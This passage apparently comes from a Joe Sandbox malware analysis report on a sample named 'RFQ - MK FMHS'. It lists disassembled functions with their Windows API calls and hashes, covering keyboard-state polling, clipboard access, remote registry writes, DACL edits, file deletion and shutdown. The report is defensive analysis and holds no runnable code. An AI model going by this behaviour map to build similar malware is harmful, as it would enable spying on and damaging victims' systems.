                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF330
                    • FindClose.KERNEL32(00000000), ref: 00EDF33D
                    • FindClose.KERNEL32(00000000), ref: 00EDF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: a5d15d32ee4cbe2cc3a43ddfae91d5e7c9b2d8e78ed442c3513882c0e75ecbfc
                    • Instruction ID: 51f2437b359abcd89c923a3c0625b0dfef8cb10246e0c911d10f6ceca99f5ff1
                    • Opcode Fuzzy Hash: a5d15d32ee4cbe2cc3a43ddfae91d5e7c9b2d8e78ed442c3513882c0e75ecbfc
                    • Instruction Fuzzy Hash: 3731D0765002196FDF10DBB4EC89AEE73ACEF48324F145176E801F32A0EB30DA4ACA54
                    Function 00EF0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EFF910,00000000,?,00000000,?,?), ref: 00EF0C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EF0C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EF0D1D
                    • RegCloseKey.ADVAPI32(?), ref: 00EF103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 00EF104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 66f28e0d2f7debc6c6c656bbe81577d298a73ce5e76d54b453867ff26e51fd4e
                    • Instruction ID: c414547833f1b3a8b2ee23a20627959a034f67637e0bddd11a99f2cb8b278301
                    • Opcode Fuzzy Hash: 66f28e0d2f7debc6c6c656bbe81577d298a73ce5e76d54b453867ff26e51fd4e
                    • Instruction Fuzzy Hash: F2025D752006159FDB14EF25C895E2AB7E5FF88724F04985DF98AAB362CB30ED41CB81
                    Function 00EDF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EDF37E
                    • _wcscmp.LIBCMT ref: 00EDF393
                    • _wcscmp.LIBCMT ref: 00EDF3AA
                      • Part of subcall function 00ED45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ED45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00EDF3D9
                    • FindClose.KERNEL32(00000000), ref: 00EDF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF400
                    • _wcscmp.LIBCMT ref: 00EDF427
                    • _wcscmp.LIBCMT ref: 00EDF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF450
                    • SetCurrentDirectoryW.KERNEL32(00F2A5A0), ref: 00EDF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF478
                    • FindClose.KERNEL32(00000000), ref: 00EDF485
                    • FindClose.KERNEL32(00000000), ref: 00EDF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: ad39e0d1c46428cfe55c27b92babc3d2ebf8a0289b96983ef8ddad085b8f9e2d
                    • Instruction ID: bcbdda5832d4e993654042a17c7bce0f89348b476afe5dbd102a77e36721b7ed
                    • Opcode Fuzzy Hash: ad39e0d1c46428cfe55c27b92babc3d2ebf8a0289b96983ef8ddad085b8f9e2d
                    • Instruction Fuzzy Hash: B631E5715012196FDF10DBB4EC89AEF77ACDF49324F141276E811B32A0EB30DA4ACA64
                    Function 00EC81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                      • Part of subcall function 00EC874A: GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                      • Part of subcall function 00EC874A: GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                      • Part of subcall function 00EC874A: HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                      • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                      • Part of subcall function 00EC87E7: GetProcessHeap.KERNEL32(00000008,00EC8240,00000000,00000000,?,00EC8240,?), ref: 00EC87F3
                      • Part of subcall function 00EC87E7: HeapAlloc.KERNEL32(00000000,?,00EC8240,?), ref: 00EC87FA
                      • Part of subcall function 00EC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8240,?), ref: 00EC880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC825B
                    • _memset.LIBCMT ref: 00EC8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC828F
                    • GetLengthSid.ADVAPI32(?), ref: 00EC82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00EC82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC82F9
                    • GetLengthSid.ADVAPI32(?), ref: 00EC8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8325
                    • HeapAlloc.KERNEL32(00000000), ref: 00EC832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC834D
                    • CopySid.ADVAPI32(00000000), ref: 00EC8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 3cff47b799200bec1c5a7f327d8da86dba54b156b0a0394f827123a6f6e0af66
                    • Instruction ID: c6d0c82632b49a761d0c5bc4cc1f4900ff84b5f9acc9003bc188734a07de8eb7
                    • Opcode Fuzzy Hash: 3cff47b799200bec1c5a7f327d8da86dba54b156b0a0394f827123a6f6e0af66
                    • Instruction Fuzzy Hash: E5612D71A00109BFDF109F95DF44EAEBBB9FF44704F149269E815B7251DB319A06CB60
                    Function 00E86843 Relevance: 19.6, Strings: 15, Instructions: 883COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
                    • API String ID: 0-3700951917
                    • Opcode ID: e772b1d9fd33731b66b173938019cfcc38f6cc5e97d887106ea752e776dfdc60
                    • Instruction ID: 799443bc8b2524544373ce199cd31c3b02ac9a0fc50c53f92ce960fad40d1abd
                    • Opcode Fuzzy Hash: e772b1d9fd33731b66b173938019cfcc38f6cc5e97d887106ea752e776dfdc60
                    • Instruction Fuzzy Hash: 25727F71E002199BDB14DF58C980BEEB7B5FF49314F1491AAE849FB281DB319D82CB90
                    Function 00EF0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0737
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EF07D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EF086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EF0AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00EF0ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: b619302ce2bc51fd022db2cf27d7b14571500a22b1615c1393982da7fc299ecb
                    • Instruction ID: 72036277a0ef8db48c753dcf125a947a4f76e98566606c929300ae0f809133b6
                    • Opcode Fuzzy Hash: b619302ce2bc51fd022db2cf27d7b14571500a22b1615c1393982da7fc299ecb
                    • Instruction Fuzzy Hash: 1DE15D31204714AFCB14DF25C881E6ABBE9EF89714F04956DF54AEB2A2DB30ED05CB51
                    Function 00ED0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00ED0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 00ED02C2
                    • GetKeyState.USER32(000000A0), ref: 00ED02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 00ED02F7
                    • GetKeyState.USER32(000000A1), ref: 00ED030C
                    • GetAsyncKeyState.USER32(00000011), ref: 00ED0324
                    • GetKeyState.USER32(00000011), ref: 00ED0336
                    • GetAsyncKeyState.USER32(00000012), ref: 00ED034E
                    • GetKeyState.USER32(00000012), ref: 00ED0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 00ED0378
                    • GetKeyState.USER32(0000005B), ref: 00ED038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 8390b2f398958570b51524133d6fdb5a665c3c5912fdc3435b66c6e8c6a6becf
                    • Instruction ID: 34ce7999c3facdd0407f252a71eb4ad840ff75369b5c063970db5c94e1a3c8ef
                    • Opcode Fuzzy Hash: 8390b2f398958570b51524133d6fdb5a665c3c5912fdc3435b66c6e8c6a6becf
                    • Instruction Fuzzy Hash: 9341A4245047C96EFF319AA488083B5BFA0EF52348F4C509FD5C6663C2EB949DC9C7A2
                    Function 00EE86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • CoInitialize.OLE32 ref: 00EE8718
                    • CoUninitialize.OLE32 ref: 00EE8723
                    • CoCreateInstance.OLE32(?,00000000,00000017,00F02BEC,?), ref: 00EE8783
                    • IIDFromString.OLE32(?,?), ref: 00EE87F6
                    • VariantInit.OLEAUT32(?), ref: 00EE8890
                    • VariantClear.OLEAUT32(?), ref: 00EE88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: 738af0a33a0e9edc200bcc6a04d58d1fe2d7d5ae79ad3532fb0eb8b0c0c9a8e0
                    • Instruction ID: 37aea6c2cbeca1a6ab41428e84657c5fefcf3be3a28f117d13160df98efd312a
                    • Opcode Fuzzy Hash: 738af0a33a0e9edc200bcc6a04d58d1fe2d7d5ae79ad3532fb0eb8b0c0c9a8e0
                    • Instruction Fuzzy Hash: F661E0706083459FD714DF26CA44B6ABBE4AF88714F50581EF989AB291CB30ED48CB92
                    Function 00EE4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: e5b30973c3d2406d7a79c191ce644a59f499f578d874d8ac7a638888ba06e64f
                    • Instruction ID: 94112844c24cec14433f19918ef5ea3c4cd3c26ada0aa15d26928ee7e39eb65f
                    • Opcode Fuzzy Hash: e5b30973c3d2406d7a79c191ce644a59f499f578d874d8ac7a638888ba06e64f
                    • Instruction Fuzzy Hash: 9A2182753012149FDB109F56EC49B7A77A8EF84715F11806AF906FB2B1CB30AD05CB94
                    Function 00ED3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                      • Part of subcall function 00ED4CD3: GetFileAttributesW.KERNEL32(?,00ED3947), ref: 00ED4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 00ED3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00ED3B87
                    • MoveFileW.KERNEL32(?,?), ref: 00ED3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00ED3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00ED3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: f2526bbf9293aa896fd56ca8d7ddd33e8ff68c85ebeab305c4c34ceabf205c56
                    • Instruction ID: d528b76324c7088d95f082649503897dee4286b6834b9b2ea1d679c92f6427e2
                    • Opcode Fuzzy Hash: f2526bbf9293aa896fd56ca8d7ddd33e8ff68c85ebeab305c4c34ceabf205c56
                    • Instruction Fuzzy Hash: 16517F318011489ADF15EBA0DD929EDB7B8EF14304F64A1ABE44A77191DF316F0ECBA1
                    Function 00E84140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-3486589167
                    • Opcode ID: ce0d2d723268e1228de1ab1aac829f8df28b07b03aefd1fc554ec1baa8c997e3
                    • Instruction ID: 0569c3eaff9e0f531cba4e475aab4dec1a1e360505db21564b90e14ce8e9f1d0
                    • Opcode Fuzzy Hash: ce0d2d723268e1228de1ab1aac829f8df28b07b03aefd1fc554ec1baa8c997e3
                    • Instruction Fuzzy Hash: 8CA25EB0A0421ACBDF24DF58C9507EEB7B1FB54318F14A1AAD85EB7680E7709E81DB50
                    Function 00EDF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EDF6AB
                    • Sleep.KERNEL32(0000000A), ref: 00EDF6DB
                    • _wcscmp.LIBCMT ref: 00EDF6EF
                    • _wcscmp.LIBCMT ref: 00EDF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 00EDF7A8
                    • FindClose.KERNEL32(00000000), ref: 00EDF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 35df69ae76d856dfde303ff13198036cfd1d98e0f9e89fe136a2c936509e43fd
                    • Instruction ID: 5e6c6a46ba45d5c0428f3573f4543b758a090daac99113fd0e7f6149fe10827d
                    • Opcode Fuzzy Hash: 35df69ae76d856dfde303ff13198036cfd1d98e0f9e89fe136a2c936509e43fd
                    • Instruction Fuzzy Hash: 3D419D7190020A9FCF10DF64CC85AEEBBB4FF05314F14556BE81AB62A0EB309E85CB90
                    Function 00E858C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: f3a9a2e74f31249e162cd2d7e02a7fd0123b9053392db59b50051d92def97efc
                    • Instruction ID: 9e046514814ff454571267e6caaada4bac734d8660462e484e38e1af990d5a7e
                    • Opcode Fuzzy Hash: f3a9a2e74f31249e162cd2d7e02a7fd0123b9053392db59b50051d92def97efc
                    • Instruction Fuzzy Hash: FF127971A00609DBDF14DFA4DA81AEEB7F5FF48300F109569E84AB7251EB36AA11CB50
                    Function 00E85680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                      • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                    • _memmove.LIBCMT ref: 00EC062F
                    • _memmove.LIBCMT ref: 00EC0744
                    • _memmove.LIBCMT ref: 00EC07EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZ
                    • API String ID: 1300846289-3798167742
                    • Opcode ID: 754377a64ac8a2cb377b52814e4c4680e9bf7a5f86627851606d3d44f64efba8
                    • Instruction ID: d0f277c09646b9d93efd873380a87c6360ff857a36b686b350d922f61dd97a94
                    • Opcode Fuzzy Hash: 754377a64ac8a2cb377b52814e4c4680e9bf7a5f86627851606d3d44f64efba8
                    • Instruction Fuzzy Hash: 93028471A00205DFDF18DF64DA81AAE7BF5FF44300F5490A9E80AEB255EB32DA51CB91
                    Function 00ED545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                      • Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                      • Part of subcall function 00EC8CC3: GetLastError.KERNEL32 ref: 00EC8D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 00ED549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
